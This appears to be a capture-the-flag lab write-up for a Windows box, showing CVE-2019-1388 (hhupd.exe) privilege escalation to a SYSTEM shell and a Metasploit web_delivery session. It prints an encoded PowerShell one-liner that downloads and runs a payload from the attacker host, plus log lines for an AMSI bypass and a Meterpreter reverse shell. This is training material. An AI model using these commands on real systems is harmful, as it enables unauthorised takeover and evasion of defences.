Blaster
HHUPD - CVE-2019-1388
We can login on the Machine using RDP (Remote Desktop Protocol) with the following Credentials: Wade:parzival
[1]Uploading the hhupd.exe on the Target Machine. [In this case the Exploit is already Present on the Target Machine.[2]In the Properties of the Downloaded Executable:[Unblock the File][3]Run the Executable as Administrator.[4]Chose:[Show Information about this Publisher's Certificate][5]Chose:[VeriSign Commercial Software Publishers CA].This Causes to Launch a Browser Process as NT AUTHORITY\SYSTEM[6]Chose:Browser --> Tools --> File --> Save as...[7]Navigate To:C:\Windows\System32. Search forcmd.exeby using[*.* - cmd]in the File Name.[8]Run cmd.exe as Administrator.[9]The SHELL is going to Open with Administrator Rights: NT AUTHORITY\SYSTEM
Metasploit
- Using: exploit/multi/script/web_delivery
- Target: PSH (PowerShell)
- PAYLOAD: windows/meterpreter/reverse_http
Copy - PastethePSHPayload on Windows Terminal that has been Opened using hhupd.exe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started HTTP reverse handler on http://10.10.20.30:4444
[*] Using URL: http://10.10.20.30:8080/fYqJ9hR
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABhAGoAdQBPAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGEAagB1AE8ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABhAGoAdQBPAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAxAC4ANwAyAC4ANQA3ADoAOAAwADgAMAAvAGYAWQBxAEoAOQBoAFIALwBDAEgASAA1AGgAbQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAxAC4ANwAyAC4ANQA3ADoAOAAwADgAMAAvAGYAWQBxAEoAOQBoAFIAJwApACkAOwA=
[*] 10.10.155.185 web_delivery - Delivering AMSI Bypass (1381 bytes)
[*] 10.10.155.185 web_delivery - Delivering Payload (3926 bytes)
[!] http://10.10.20.30:4444 handling request from 10.10.155.185; (UUID: 10d0btts) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.20.30:4444 handling request from 10.10.155.185; (UUID: 10d0btts) Staging x86 payload (176732 bytes) ...
[!] http://10.10.20.30:4444 handling request from 10.10.155.185; (UUID: 10d0btts) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.20.30:4444 -> 127.0.0.1) at 2022-10-10 04:44:39 +0200
- We have System Rights: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : RETROWEB
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows